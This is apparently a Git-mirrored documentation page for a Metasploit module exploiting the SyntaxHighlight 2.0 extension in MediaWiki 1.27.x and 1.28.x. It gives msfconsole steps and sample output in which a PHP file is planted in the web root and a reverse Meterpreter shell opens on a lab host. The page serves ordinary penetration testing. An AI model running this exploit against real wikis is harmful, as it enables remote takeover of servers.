adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0eb79e8c8cdc9b2fef61ca8cab3f1dc93de79b77
metasploit-gs/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md
T
Yorick Koster 0eb79e8c8c Added docs for mediawiki_syntaxhighlight.rb
2017-04-29 16:14:25 +02:00

1.3 KiB
Raw Blame History

Vulnerable Application

Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages.

Verification Steps

  1. use exploit/multi/http/mediawiki_syntaxhighlight
  2. set RHOST <ip target site>
  3. set TARGETURI <MediaWiki path>
  4. set UPLOADPATH <writable path in web root>
  5. optionally set RPORT, SSL, and VHOST
  6. exploit
  7. Verify a new Meterpreter session is started

Sample Output

msf > use exploit/multi/http/mediawiki_syntaxhighlight 
msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
RHOST => 192.168.146.137
msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
TARGETURI => /mediawiki
msf exploit(mediawiki_syntaxhighlight) > exploit

[*] Started reverse TCP handler on 192.168.146.197:4444 
[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
[*] Sending stage (33986 bytes) to 192.168.146.137
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
Reference in New Issue View Git Blame Copy Permalink